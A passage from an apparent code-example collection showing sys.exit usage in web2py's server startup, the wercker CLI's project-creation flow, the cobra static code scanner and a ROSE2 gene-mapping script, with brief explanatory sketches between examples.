    # ## or start interface if we want to put in taskbar (system tray)

    try:
        options.taskbar
    except:
        options.taskbar = False

    if options.taskbar and os.name != 'nt':
        print 'Error: taskbar not supported on this platform'
        sys.exit(1)

    root = None

    if not options.nogui and options.password=='<ask>':
        try:
            import Tkinter
            havetk = True
            try:
                root = Tkinter.Tk()
            except:
                pass
        except (ImportError, OSError):
            logger.warn(
                'GUI not available because Tk library is not installed')
            havetk = False
            options.nogui = True

    if root:
        root.focus_force()

        # Mac OS X - make the GUI window rise to the top
        if os.path.exists("/usr/bin/osascript"):
            applescript = """
tell application "System Events"
    set proc to first process whose unix id is %d
    set frontmost of proc to true
end tell
""" % (os.getpid())
            os.system("/usr/bin/osascript -e '%s'" % applescript)

        master = web2pyDialog(root, options)
        signal.signal(signal.SIGTERM, lambda a, b: master.quit())

        try:
            root.mainloop()
        except:
            master.quit()

        sys.exit()

    # ## if no tk and no password, ask for a password

    if not root and options.password == '<ask>':
        options.password = getpass.getpass('choose a password:')

    if not options.password and not options.nobanner:
        print 'no password, no admin interface'

    # ##-X (if no tk, the widget takes care of it itself)
    if not root and options.scheduler and options.with_scheduler:
        t = threading.Thread(target=start_schedulers, args=(options,))
        t.start()

    # ## start server

    # Use first interface IP and port if interfaces specified, since the
    # interfaces option overrides the IP (and related) options.
    if not options.interfaces:
        (ip, port) = (options.ip, int(options.port))
    else:
        first_if = options.interfaces[0]
        (ip, port) = first_if[0], first_if[1]

    # Check for non default value for ssl inputs
    if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
        proto = 'https'
    else:
        proto = 'http'

    url = get_url(ip, proto=proto, port=port)

    if not options.nobanner:
        message = '\nplease visit:\n\t%s\n' % url
        if sys.platform.startswith('win'):
            message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n' % os.getpid()
        else:
            message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n' % os.getpid()
        print message

    # enhance linecache.getline (used by debugger) to look at the source file
    # if the line was not found (under py2exe & when file was modified)
    import linecache
    py2exe_getline = linecache.getline
    def getline(filename, lineno, *args, **kwargs):
        line = py2exe_getline(filename, lineno, *args, **kwargs)
        if not line:
            try:
                f = open(filename, "r")
                try:
                    for i, line in enumerate(f):
                        if lineno == i + 1:
                            break
                    else:
                        line = None
                finally:
                    f.close()
            except (IOError, OSError):
                line = None
        return line
    linecache.getline = getline

    server = main.HttpServer(ip=ip,
                             port=port,
                             password=options.password,
                             pid_filename=options.pid_filename,
                             log_filename=options.log_filename,
                             profiler_dir=options.profiler_dir,
                             ssl_certificate=options.ssl_certificate,
                             ssl_private_key=options.ssl_private_key,
                             ssl_ca_certificate=options.ssl_ca_certificate,
                             min_threads=options.minthreads,
                             max_threads=options.maxthreads,
                             server_name=options.server_name,
                             request_queue_size=options.request_queue_size,
                             timeout=options.timeout,
                             socket_timeout=options.socket_timeout,
                             shutdown_timeout=options.shutdown_timeout,
                             path=options.folder,
                             interfaces=options.interfaces)

    try:
        server.start()
    except KeyboardInterrupt:
        server.stop()
        try:
            t.join()
        except:
            pass
    logging.shutdown()
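
In the example above, sys.exit appears three times: sys.exit(1) when the -L
config module cannot be imported, sys.exit(1) when --taskbar is requested on a
non-Windows platform, and a bare sys.exit() once the Tk mainloop returns, so
the console-server code below it never runs. A minimal, self-contained sketch
of that convention (the flag names are illustrative, not web2py's real
options):

import sys

def start_sketch(argv):
    if '--bad-config' in argv:
        print('Cannot import config file')
        sys.exit(1)    # non-zero status: the caller sees a startup failure
    if '--taskbar' in argv and not sys.platform.startswith('win'):
        print('Error: taskbar not supported on this platform')
        sys.exit(1)
    if '--gui' in argv:
        print('pretend the Tk mainloop just returned')
        sys.exit()     # same as sys.exit(None): exit status 0, normal shutdown
    print('no GUI requested; the console server would start here')

if __name__ == '__main__':
    start_sketch(sys.argv[1:])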

Example 17

Project: termite-visualizations
Source File: widget.py
View license
def start(cron=True):
    """ Start server  """

    # ## get command line arguments

    (options, args) = console()

    if not options.nobanner:
        print ProgramName
        print ProgramAuthor
        print ProgramVersion

    from dal import DRIVERS
    if not options.nobanner:
        print 'Database drivers available: %s' % ', '.join(DRIVERS)

    # ## if -L load options from options.config file
    if options.config:
        try:
            options2 = __import__(options.config, {}, {}, '')
        except Exception:
            try:
                # Jython doesn't like the extra stuff
                options2 = __import__(options.config)
            except Exception:
                print 'Cannot import config file [%s]' % options.config
                sys.exit(1)
        for key in dir(options2):
            if hasattr(options, key):
                setattr(options, key, getattr(options2, key))

    logfile0 = os.path.join('extras','examples','logging.example.conf')
    if not os.path.exists('logging.conf') and os.path.exists(logfile0):
        import shutil
        sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
        shutil.copyfile(logfile0, 'logging.conf')
        sys.stdout.write("OK\n")

    # ## if -T run doctests (no cron)
    if hasattr(options, 'test') and options.test:
        test(options.test, verbose=options.verbose)
        return

    # ## if -S start interactive shell (also no cron)
    if options.shell:
        if not options.args is None:
            sys.argv[:] = options.args
        run(options.shell, plain=options.plain, bpython=options.bpython,
            import_models=options.import_models, startfile=options.run,
            cronjob=options.cronjob)
        return

    # ## if -C start cron run (extcron) and exit
    # ##    -K specifies optional apps list (overloading scheduler)
    if options.extcron:
        logger.debug('Starting extcron...')
        global_settings.web2py_crontype = 'external'
        if options.scheduler:   # -K
            apps = [app.strip() for app in options.scheduler.split(
                ',') if check_existent_app(options, app.strip())]
        else:
            apps = None
        extcron = newcron.extcron(options.folder, apps=apps)
        extcron.start()
        extcron.join()
        return

    # ## if -K
    if options.scheduler and not options.with_scheduler:
        try:
            start_schedulers(options)
        except KeyboardInterrupt:
            pass
        return

    # ## if -H cron is enabled in this *process*
    # ## if --softcron use softcron
    # ## use hardcron in all other cases
    if cron and options.runcron and options.softcron:
        print 'Using softcron (but this is not very efficient)'
        global_settings.web2py_crontype = 'soft'
    elif cron and options.runcron:
        logger.debug('Starting hardcron...')
        global_settings.web2py_crontype = 'hard'
        newcron.hardcron(options.folder).start()

    # ## if no password provided and havetk start Tk interface
    # ## or start interface if we want to put in taskbar (system tray)

    try:
        options.taskbar
    except:
        options.taskbar = False

    if options.taskbar and os.name != 'nt':
        print 'Error: taskbar not supported on this platform'
        sys.exit(1)

    root = None

    if not options.nogui and options.password=='<ask>':
        try:
            import Tkinter
            havetk = True
            try:
                root = Tkinter.Tk()
            except:
                pass
        except (ImportError, OSError):
            logger.warn(
                'GUI not available because Tk library is not installed')
            havetk = False
            options.nogui = True

    if root:
        root.focus_force()

        # Mac OS X - make the GUI window rise to the top
        if os.path.exists("/usr/bin/osascript"):
            applescript = """
tell application "System Events"
    set proc to first process whose unix id is %d
    set frontmost of proc to true
end tell
""" % (os.getpid())
            os.system("/usr/bin/osascript -e '%s'" % applescript)

        master = web2pyDialog(root, options)
        signal.signal(signal.SIGTERM, lambda a, b: master.quit())

        try:
            root.mainloop()
        except:
            master.quit()

        sys.exit()

    # ## if no tk and no password, ask for a password

    if not root and options.password == '<ask>':
        options.password = getpass.getpass('choose a password:')

    if not options.password and not options.nobanner:
        print 'no password, no admin interface'

    # ##-X (if no tk, the widget takes care of it itself)
    if not root and options.scheduler and options.with_scheduler:
        t = threading.Thread(target=start_schedulers, args=(options,))
        t.start()

    # ## start server

    # Use first interface IP and port if interfaces specified, since the
    # interfaces option overrides the IP (and related) options.
    if not options.interfaces:
        (ip, port) = (options.ip, int(options.port))
    else:
        first_if = options.interfaces[0]
        (ip, port) = first_if[0], first_if[1]

    # Check for non default value for ssl inputs
    if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
        proto = 'https'
    else:
        proto = 'http'

    url = get_url(ip, proto=proto, port=port)

    if not options.nobanner:
        print 'please visit:'
        print '\t', url
        print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid()

    # enhance linecache.getline (used by debugger) to look at the source file
    # if the line was not found (under py2exe & when file was modified)
    import linecache
    py2exe_getline = linecache.getline
    def getline(filename, lineno, *args, **kwargs):
        line = py2exe_getline(filename, lineno, *args, **kwargs)
        if not line:
            try:
                f = open(filename, "r")
                try:
                    for i, line in enumerate(f):
                        if lineno == i + 1:
                            break
                    else:
                        line = None
                finally:
                    f.close()
            except (IOError, OSError):
                line = None
        return line
    linecache.getline = getline

    server = main.HttpServer(ip=ip,
                             port=port,
                             password=options.password,
                             pid_filename=options.pid_filename,
                             log_filename=options.log_filename,
                             profiler_dir=options.profiler_dir,
                             ssl_certificate=options.ssl_certificate,
                             ssl_private_key=options.ssl_private_key,
                             ssl_ca_certificate=options.ssl_ca_certificate,
                             min_threads=options.minthreads,
                             max_threads=options.maxthreads,
                             server_name=options.server_name,
                             request_queue_size=options.request_queue_size,
                             timeout=options.timeout,
                             socket_timeout=options.socket_timeout,
                             shutdown_timeout=options.shutdown_timeout,
                             path=options.folder,
                             interfaces=options.interfaces)

    try:
        server.start()
    except KeyboardInterrupt:
        server.stop()
        try:
            t.join()
        except:
            pass
    logging.shutdown()
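
Example 17 is essentially the same widget.py as Example 16; one detail worth
noting is the shutdown block at the end. The bare try/except around t.join()
is there because t (the scheduler thread) is only created when both -K and
--with-scheduler are given, so joining it can raise a NameError. A minimal,
self-contained sketch of that Ctrl-C shutdown sequence, with stand-ins for the
server and the scheduler:

import logging
import sys
import threading
import time

def scheduler():
    time.sleep(0.1)            # stand-in for start_schedulers(options)

def serve(with_scheduler=False):
    t = None
    if with_scheduler:
        t = threading.Thread(target=scheduler)
        t.start()
    try:
        while True:            # stand-in for server.start()
            time.sleep(1)
    except KeyboardInterrupt:
        if t is not None:      # the original wraps this in a bare try/except,
            t.join()           # since t may never have been created
    logging.shutdown()

if __name__ == '__main__':
    serve()
    sys.exit(0)                # explicit success status after a clean stop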

Example 18

Project: wercker-cli
Source File: create.py
View license
@login_required
def create(path='.', valid_token=None):
    if not valid_token:
        raise ValueError("A valid token is required!")

    term = get_term()

    if get_value(VALUE_PROJECT_ID, print_warnings=False):
        puts("A .wercker file was found.")
        run_create = prompt.yn(
            "Are you sure you want to run `wercker create`?",
            default="n")

        if run_create is False:
            puts("Aborting.")
            return
        else:
            puts("")

    if project_link(
        valid_token=valid_token,
        puts_result=False,
        auto_link=False
    ):
        puts("A matching application was found on wercker.")
        use_link = prompt.yn("Do you want to run 'wercker link' instead of\
 `wercker create`?")

        puts("")

        if use_link is True:
            project_link(valid_token=valid_token)
            return

    path = find_git_root(path)

    if path:
        options = get_remote_options(path)

        heroku_options = filter_heroku_sources(options)
    else:
        options = []
        heroku_options = []

    if not path:
        return False

    puts('''About to create an application on wercker.

This consists of the following steps:
1. Configure application
2. Setup keys
3. Add a deploy target ({heroku_options} heroku targets detected)
4. Trigger initial build'''.format(
        wercker_url=get_value(VALUE_WERCKER_URL),
        heroku_options=len(heroku_options))
    )

    if not path:
        puts(
            term.red("Error:") +
            " Could not find a repository." +
            " wercker create requires a git repository. Create/clone a\
 repository first."
        )
        return

    options = [o for o in options if o not in heroku_options]

    options = [o for o in options if o.priority > 1]

    count = len(options)
    puts('''
Step ''' + term.white('1') + '''. Configure application
-------------
''')
    puts(
        "%s repository location(s) found...\n"
        % term.bold(str(count))
    )

    url = pick_url(options)
    url = convert_to_url(url)

    source = get_preferred_source_type(url)
    puts("\n%s repository detected..." % source)
    puts("Selected repository url is %s\n" % url)

    client = Client()

    code, profile = client.get_profile(valid_token)

    source_type = get_source_type(url)

    if source_type == SOURCE_BITBUCKET:
        if profile.get('hasBitbucketToken', False) is False:
            puts("No Bitbucket account linked with your profile. Wercker uses\
 this connection to linkup some events for your repository on Bitbucket to our\
  service.")
            provider_url = get_value(
                VALUE_WERCKER_URL
            ) + '/provider/add/cli/bitbucket'

            puts("Launching {url} to start linking.".format(
                url=provider_url
            ))
            from time import sleep

            sleep(5)
            import webbrowser

            webbrowser.open(provider_url)

            raw_input("Press enter to continue...")
    elif source_type == SOURCE_GITHUB:
        if profile.get('hasGithubToken', False) is False:
            puts("No GitHub account linked with your profile. Wercker uses\
 this connection to linkup some events for your repository on GitHub to our\
 service.")
            provider_url = get_value(
                VALUE_WERCKER_URL
            ) + '/provider/add/cli/github'

            puts("Launching {url} to start linking.".format(
                url=provider_url
            ))

            from time import sleep

            sleep(5)

            import webbrowser

            webbrowser.open(provider_url)

            raw_input("Press enter to continue...")
    username = get_username(url)
    project = get_project(url)

    puts('''
Step {t.white}2{t.normal}.
-------------
In order to clone the repository on wercker, an ssh key is needed. A new/unique
key can be generated for each repository. There are 3 ways of using ssh keys on
wercker:

{t.green}1. Automatically add a deploy key [recommended]{t.normal}
2. Use the checkout key that wercker uses for public projects.
3. Let wercker generate a key, but add it manually to github/bitbucket yourself.
(needed when using git submodules)

For more information on this see: http://etc...
'''.format(t=term))
    key_method = None
    while(True):
        result = prompt.get_value_with_default(
            "Options:",
            '1'
        )

        valid_values = [str(i + 1) for i in range(3)]

        if result in valid_values:
            key_method = valid_values.index(result)
            break
        else:
            puts(term.red("warning: ") + " invalid build selected.")

    checkout_key_id = None
    checkout_key_publicKey = None

    if(key_method != 1):
        puts('''Retrieving a new ssh-key.''')
        status, response = client.create_checkout_key()
        puts("done.")

        if status == 200:
            checkout_key_id = response['id']
            checkout_key_publicKey = response['publicKey']

            if key_method == 0:
                puts('Adding deploy key to repository:')
                status, response = client.link_checkout_key(valid_token,
                                                            checkout_key_id,
                                                            username,
                                                            project,
                                                            source_type)
                if status != 200:
                    puts(term.red("Error:") +
                         " uanble to add key to repository.")
                    sys.exit(1)
            elif key_method == 2:
                profile_username = profile.get('username')
                status, response = client.get_profile_detailed(
                    valid_token,
                    profile_username)

                username = response[source_type + 'Username']
                url = None
                if source_type == SOURCE_GITHUB:
                    url = "https://github.com/settings/ssh"
                elif source_type == SOURCE_BITBUCKET:
                    url = "http://bitbucket.org/account/user/{username}/\
ssh-keys/"

                if status == 200:
                    formatted_key = "\n".join(
                        textwrap.wrap(checkout_key_publicKey))

                    puts('''Please add the following public key:
    {publicKey}

    You can add the key here: {url}\n'''.format(publicKey=formatted_key,
                                                url=url.format(
                                                    username=username)))
                    raw_input("Press enter to continue...")
                else:
                    puts(term.red("Error:") +
                         " unable to load wercker profile information.")
                    sys.exit(1)
        else:
            puts(term.red("Error:") + 'unable to retrieve an ssh key.')
            sys.exit(1)

    puts("Creating a new application")
    status, response = client.create_project(
        valid_token,
        username,
        project,
        source,
        checkout_key_id,
    )

    if response['success']:

        puts("done.\n")
        set_value(VALUE_PROJECT_ID, response['data']['id'])

        puts("In the root of this repository a .wercker file has been created\
 which enables the link between the source code and wercker.\n")

        site_url = None

        if source_type == SOURCE_GITHUB:

            site_url = "https://github.com/" + \
                username + \
                "/" + \
                project

        elif source_type == SOURCE_BITBUCKET:

            site_url = "https://bitbucket.org/" + \
                username + \
                "/" + \
                project

        puts('''
Step ''' + term.white('3') + '''.
-------------
''')

        target_options = heroku_options

        nr_targets = len(target_options)
        puts("%s automatic supported target(s) found." % str(nr_targets))

        if nr_targets:
            target_add(valid_token=valid_token)

        puts('''
Step ''' + term.white('4') + '''.
-------------
''')

        project_build(valid_token=valid_token)

        puts('''
Done.
-------------

You are all set up for using wercker. You can trigger new builds by
committing and pushing your latest changes.

Happy coding!''')
    else:
        puts(
            term.red("Error: ") +
            "Unable to create project. \n\nResponse: %s\n" %
            (response.get('errorMessage'))
        )
        puts('''
Note: only repositories that the wercker user has permissions on can be added.
This is because some event hooks for wercker need to be registered on the
repository. If you want to test a public repository and don't have permissions
 on it: fork it. You can add the forked repository to wercker''')
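
The create() flow above aborts with sys.exit(1) whenever a wercker API call
fails part-way through (adding the deploy key, loading the profile, or
requesting an ssh key), after printing an error in red. A minimal sketch of
that "print the error, then exit non-zero" helper; red() below is a stand-in
for the term.red call used above, and abort() is a hypothetical name:

import sys

def red(text):
    # Stand-in for term.red: wrap the text in an ANSI colour escape.
    return '\033[31m%s\033[0m' % text

def abort(message, exit_code=1):
    print(red("Error: ") + message)
    sys.exit(exit_code)    # non-zero so scripts driving the CLI see a failure

# Example: abort("unable to add key to repository.")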

Example 19

Project: cobra
Source File: static.py
View license
    def analyse(self):
        if self.directory is None:
            logging.critical("Please set directory")
            sys.exit()
        logging.info('Start code static analyse...')

        d = directory.Directory(self.directory)
        files = d.collect_files(self.task_id)
        logging.info('Scan Files: {0}, Total Time: {1}s'.format(files['file_nums'], files['collect_time']))

        ext_language = {
            # Image
            '.jpg': 'image',
            '.png': 'image',
            '.bmp': 'image',
            '.gif': 'image',
            '.ico': 'image',
            '.cur': 'image',
            # Font
            '.eot': 'font',
            '.otf': 'font',
            '.svg': 'font',
            '.ttf': 'font',
            '.woff': 'font',
            # CSS
            '.css': 'css',
            '.less': 'css',
            '.scss': 'css',
            '.styl': 'css',
            # Media
            '.mp3': 'media',
            '.swf': 'media',
            # Execute
            '.exe': 'execute',
            '.sh': 'execute',
            '.dll': 'execute',
            '.so': 'execute',
            '.bat': 'execute',
            '.pl': 'execute',
            # Edit
            '.swp': 'tmp',
            # Cert
            '.crt': 'cert',
            # Text
            '.txt': 'text',
            '.csv': 'text',
            '.md': 'markdown',
            # Backup
            '.zip': 'backup',
            '.bak': 'backup',
            '.tar': 'backup',
            '.rar': 'backup',
            '.tar.gz': 'backup',
            '.db': 'backup',
            # Config
            '.xml': 'config',
            '.yml': 'config',
            '.spf': 'config',
            '.iml': 'config',
            '.manifest': 'config',
            # Source
            '.psd': 'source',
            '.as': 'source',
            # Log
            '.log': 'log',
            # Template
            '.template': 'template',
            '.tpl': 'template',
        }
        for ext in files:
            if ext in ext_language:
                logging.info('{0} - {1}'.format(ext, files[ext]))
                continue
            else:
                logging.info(ext)

        languages = CobraLanguages.query.all()

        rules = CobraRules.query.filter_by(status=1).all()
        extensions = None
        # `grep` (`ggrep` on Mac)
        grep = '/bin/grep'
        # `find` (`gfind` on Mac)
        find = '/bin/find'
        if 'darwin' == sys.platform:
            ggrep = ''
            gfind = ''
            for root, dir_names, file_names in os.walk('/usr/local/Cellar/grep'):
                for filename in file_names:
                    if 'ggrep' == filename or 'grep' == filename:
                        ggrep = os.path.join(root, filename)
            for root, dir_names, file_names in os.walk('/usr/local/Cellar/findutils'):
                for filename in file_names:
                    if 'gfind' == filename:
                        gfind = os.path.join(root, filename)
            if ggrep == '':
                logging.critical("brew install ggrep pleases!")
                sys.exit(0)
            else:
                grep = ggrep
            if gfind == '':
                logging.critical("brew install findutils pleases!")
                sys.exit(0)
            else:
                find = gfind

        """
        all vulnerabilities
        vulnerabilities_all[vuln_id] = {'name': 'vuln_name', 'third_v_id': 'third_v_id'}
        """
        vulnerabilities_all = {}
        vulnerabilities = CobraVuls.query.all()
        for v in vulnerabilities:
            vulnerabilities_all[v.id] = {
                'name': v.name,
                'third_v_id': v.third_v_id
            }

        for rule in rules:
            rule.regex_location = rule.regex_location.strip()
            rule.regex_repair = rule.regex_repair.strip()
            logging.info('------------------\r\nScan rule id: {0} {1} {2}'.format(self.project_id, rule.id, rule.description))
            # Filters
            for language in languages:
                if language.id == rule.language:
                    extensions = language.extensions.split('|')
            if extensions is None:
                logging.critical("Rule Language Error")
                sys.exit(0)

            # White list
            white_list = []
            ws = CobraWhiteList.query.filter_by(project_id=self.project_id, rule_id=rule.id, status=1).all()
            if ws is not None:
                for w in ws:
                    white_list.append(w.path)

            try:
                if rule.regex_location == "":
                    filters = []
                    for index, e in enumerate(extensions):
                        if index > 1:
                            filters.append('-o')
                        filters.append('-name')
                        filters.append('*' + e)
                    # Find Special Ext Files
                    param = [find, self.directory, "-type", "f"] + filters
                else:
                    filters = []
                    for e in extensions:
                        filters.append('--include=*' + e)

                    # explode dirs
                    explode_dirs = ['.svn', '.cvs', '.hg', '.git', '.bzr']
                    for explode_dir in explode_dirs:
                        filters.append('--exclude-dir={0}'.format(explode_dir))

                    # -n Show Line number / -r Recursive / -P Perl regular expression
                    param = [grep, "-n", "-r", "-P"] + filters + [rule.regex_location, self.directory]

                logging.debug(' '.join(param))
                p = subprocess.Popen(param, stdout=subprocess.PIPE)
                result = p.communicate()

                # Exists result
                if len(result[0]):
                    lines = str(result[0]).strip().split("\n")
                    for line in lines:
                        line = line.strip()
                        if line == '':
                            continue
                        # parse the grep result (path:line:content)
                        if ':' in line:
                            line_split = line.split(':', 1)
                            file_path = line_split[0].strip()
                            code_content = line_split[1].split(':', 1)[1].strip()
                            line_number = line_split[1].split(':', 1)[0].strip()
                        else:
                            # file search result (path only)
                            file_path = line
                            code_content = ''
                            line_number = 0
                        # core rule verification
                        result_info = {
                            'task_id': self.task_id,
                            'project_id': self.project_id,
                            'project_directory': self.directory,
                            'rule_id': rule.id,
                            'file_path': file_path,
                            'line_number': line_number,
                            'code_content': code_content,
                            'third_party_vulnerabilities_name': vulnerabilities_all[rule.vul_id]['name'],
                            'third_party_vulnerabilities_type': vulnerabilities_all[rule.vul_id]['third_v_id']
                        }
                        ret_status, ret_result = Core(result_info, rule, self.project_name, white_list).scan()
                        if ret_status is False:
                            logging.info("扫描 R: False {0}".format(ret_result))
                            continue

                else:
                    logging.info('Not Found')

            except Exception as e:
                print(traceback.print_exc())
                logging.critical('Error calling grep: ' + str(e))

        # Set End Time For Task
        t = CobraTaskInfo.query.filter_by(id=self.task_id).first()
        t.status = 2
        t.file_count = files['file_nums']
        t.time_end = int(time.time())
        t.time_consume = t.time_end - t.time_start
        t.updated_at = time.strftime('%Y-%m-%d %X', time.localtime())
        try:
            db.session.add(t)
            db.session.commit()
        except Exception as e:
            logging.critical("Set start time failed:" + e.message)
        logging.info("Scan Done")

Example 20

Project: pipeline
Source File: ROSE2_geneMapper.py
View license
def mapEnhancerToGeneTop(rankByBamFile, controlBamFile, genome, annotFile, enhancerFile, transcribedFile='', uniqueGenes=True, searchWindow=50000, noFormatTable=False):
    '''
    maps genes to enhancers. If uniqueGenes is True, reduces to the gene name only; otherwise, reports one row per refseq ID.
    '''
    startDict = utils.makeStartDict(annotFile)
    enhancerName = enhancerFile.split('/')[-1].split('.')[0]
    enhancerTable = utils.parseTable(enhancerFile, '\t')

    # internal parameter for debugging
    byRefseq = False

    if len(transcribedFile) > 0:
        transcribedTable = utils.parseTable(transcribedFile, '\t')
        transcribedGenes = [line[1] for line in transcribedTable]
    else:
        transcribedGenes = startDict.keys()

    print('MAKING TRANSCRIPT COLLECTION')
    transcribedCollection = utils.makeTranscriptCollection(
        annotFile, 0, 0, 500, transcribedGenes)

    print('MAKING TSS COLLECTION')
    tssLoci = []
    for geneID in transcribedGenes:
        tssLoci.append(utils.makeTSSLocus(geneID, startDict, 0, 0))

    # this turns the tssLoci list into a LocusCollection
    # 50 is the internal parameter for LocusCollection and doesn't really
    # matter
    tssCollection = utils.LocusCollection(tssLoci, 50)

    geneDict = {'overlapping': defaultdict(
        list), 'proximal': defaultdict(list)}

    # dictionaries to hold ranks and superstatus of gene nearby enhancers
    rankDict = defaultdict(list)
    superDict = defaultdict(list)

    # list of all genes that appear in this analysis
    overallGeneList = []

    # find the damn header
    for line in enhancerTable:
        if line[0][0] == '#':
            continue
        else:
            header = line
            break

    if noFormatTable:
        # set up the output tables
        # first by enhancer
        enhancerToGeneTable = [
            header + ['OVERLAP_GENES', 'PROXIMAL_GENES', 'CLOSEST_GENE']]

    else:
        # set up the output tables
        # first by enhancer
        enhancerToGeneTable = [
            header[0:9] + ['OVERLAP_GENES', 'PROXIMAL_GENES', 'CLOSEST_GENE'] + header[-2:]]

        # next by gene
        geneToEnhancerTable = [
            ['GENE_NAME', 'REFSEQ_ID', 'PROXIMAL_ENHANCERS']]

    # next make the gene to enhancer table
    geneToEnhancerTable = [
        ['GENE_NAME', 'REFSEQ_ID', 'PROXIMAL_ENHANCERS', 'ENHANCER_RANKS', 'IS_SUPER', 'ENHANCER_SIGNAL']]

    for line in enhancerTable:
        if line[0][0] == '#' or line[0][0] == 'R':
            continue

        enhancerString = '%s:%s-%s' % (line[1], line[2], line[3])

        enhancerLocus = utils.Locus(line[1], line[2], line[3], '.', line[0])

        # overlapping genes are transcribed genes whose transcript is directly
        # in the stitchedLocus
        overlappingLoci = transcribedCollection.getOverlap(
            enhancerLocus, 'both')
        overlappingGenes = []
        for overlapLocus in overlappingLoci:
            overlappingGenes.append(overlapLocus.ID())

        # proximalGenes are transcribed genes where the tss is within 50kb of
        # the boundary of the stitched loci
        proximalLoci = tssCollection.getOverlap(
            utils.makeSearchLocus(enhancerLocus, searchWindow, searchWindow), 'both')
        proximalGenes = []
        for proxLocus in proximalLoci:
            proximalGenes.append(proxLocus.ID())

        distalLoci = tssCollection.getOverlap(
            utils.makeSearchLocus(enhancerLocus, 1000000, 1000000), 'both')
        distalGenes = []
        for proxLocus in distalLoci:
            distalGenes.append(proxLocus.ID())

        overlappingGenes = utils.uniquify(overlappingGenes)
        proximalGenes = utils.uniquify(proximalGenes)
        distalGenes = utils.uniquify(distalGenes)
        allEnhancerGenes = overlappingGenes + proximalGenes + distalGenes
        # these checks make sure each gene list is unique.
        # technically it is possible for a gene to be overlapping, but not proximal since the
        # gene could be longer than the 50kb window, but we'll let that slide
        # here
        for refID in overlappingGenes:
            if proximalGenes.count(refID) == 1:
                proximalGenes.remove(refID)

        for refID in proximalGenes:
            if distalGenes.count(refID) == 1:
                distalGenes.remove(refID)

        # Now find the closest gene
        if len(allEnhancerGenes) == 0:
            closestGene = ''
        else:
            # get enhancerCenter
            enhancerCenter = (int(line[2]) + int(line[3])) / 2

            # get absolute distance to enhancer center
            distList = [abs(enhancerCenter - startDict[geneID]['start'][0])
                        for geneID in allEnhancerGenes]
            # get the ID and convert to name
            closestGene = startDict[
                allEnhancerGenes[distList.index(min(distList))]]['name']

        # NOW WRITE THE ROW FOR THE ENHANCER TABLE
        if noFormatTable:

            newEnhancerLine = list(line)
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in overlappingGenes]), ','))
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in proximalGenes]), ','))
            newEnhancerLine.append(closestGene)

        else:
            newEnhancerLine = line[0:9]
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in overlappingGenes]), ','))
            newEnhancerLine.append(
                join(utils.uniquify([startDict[x]['name'] for x in proximalGenes]), ','))
            newEnhancerLine.append(closestGene)
            newEnhancerLine += line[-2:]

        enhancerToGeneTable.append(newEnhancerLine)
        # Now grab all overlapping and proximal genes for the gene ordered
        # table

        overallGeneList += overlappingGenes
        for refID in overlappingGenes:
            geneDict['overlapping'][refID].append(enhancerString)
            rankDict[refID].append(int(line[-2]))
            superDict[refID].append(int(line[-1]))

        overallGeneList += proximalGenes
        for refID in proximalGenes:
            geneDict['proximal'][refID].append(enhancerString)
            rankDict[refID].append(int(line[-2]))
            superDict[refID].append(int(line[-1]))

    # End loop through
    # Make table by gene
    print('MAKING ENHANCER ASSOCIATED GENE TSS COLLECTION')
    overallGeneList = utils.uniquify(overallGeneList)

    #get the chromLists from the various bams here
    cmd = 'samtools idxstats %s' % (rankByBamFile)
    idxStats = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
    idxStats= idxStats.communicate()
    bamChromList = [line.split('\t')[0] for line in idxStats[0].split('\n')[0:-2]]
    
    if len(controlBamFile) > 0:
        cmd = 'samtools idxstats %s' % (controlBamFile)
        idxStats = subprocess.Popen(cmd,stdout=subprocess.PIPE,shell=True)
        idxStats= idxStats.communicate()
        bamChromListControl = [line.split('\t')[0] for line in idxStats[0].split('\n')[0:-2]]
        bamChromList = [chrom for chrom in bamChromList if bamChromListControl.count(chrom) != 0]



    #now make sure no genes have a bad chrom 
    overallGeneList = [gene for gene in overallGeneList if bamChromList.count(startDict[gene]['chr']) != 0]

    
    #now make an enhancer collection of all transcripts    
    enhancerGeneCollection = utils.makeTranscriptCollection(
        annotFile, 5000, 5000, 500, overallGeneList)

    enhancerGeneGFF = utils.locusCollectionToGFF(enhancerGeneCollection)

    # dump the gff to file
    enhancerFolder = utils.getParentFolder(enhancerFile)
    gffRootName = "%s_TSS_ENHANCER_GENES_-5000_+5000" % (genome)
    enhancerGeneGFFFile = "%s%s_%s.gff" % (enhancerFolder, enhancerName,gffRootName)
    utils.unParseTable(enhancerGeneGFF, enhancerGeneGFFFile, '\t')

    # now we need to run bamToGFF

    # Try to use the bamliquidator_path.py script on the cluster; otherwise, fail over to a local copy (in PATH); otherwise fail.
    bamliquidator_path = 'bamliquidator_batch'


    print('MAPPING SIGNAL AT ENHANCER ASSOCIATED GENE TSS')
    # map density at genes in the +/- 5kb tss region
    # first on the rankBy bam
    bamName = rankByBamFile.split('/')[-1]
    mappedRankByFolder = "%s%s_%s_%s/" % (enhancerFolder, enhancerName,gffRootName, bamName)
    mappedRankByFile = "%s%s_%s_%s/matrix.txt" % (enhancerFolder,enhancerName, gffRootName, bamName)
    cmd = bamliquidator_path + ' --sense . -e 200 --match_bamToGFF -r %s -o %s %s' % (enhancerGeneGFFFile, mappedRankByFolder,rankByBamFile)
    print("Mapping rankby bam %s" % (rankByBamFile))
    print(cmd)
    os.system(cmd)

    #check for completion
    if utils.checkOutput(mappedRankByFile,0.2,5):
        print("SUCCESSFULLY MAPPED TO %s FROM BAM: %s" % (enhancerGeneGFFFile, rankByBamFile))
    else:
        print("ERROR: FAILED TO MAP %s FROM BAM: %s" % (enhancerGeneGFFFile, rankByBamFile))
        sys.exit()

    # next on the control bam if it exists
    if len(controlBamFile) > 0:
        controlName = controlBamFile.split('/')[-1]
        mappedControlFolder = "%s%s_%s_%s/" % (
            enhancerFolder, enhancerName,gffRootName, controlName)
        mappedControlFile = "%s%s_%s_%s/matrix.txt" % (
            enhancerFolder, enhancerName,gffRootName, controlName)
        cmd = bamliquidator_path + ' --sense . -e 200 --match_bamToGFF -r %s -o %s %s' % (enhancerGeneGFFFile, mappedControlFolder,controlBamFile)
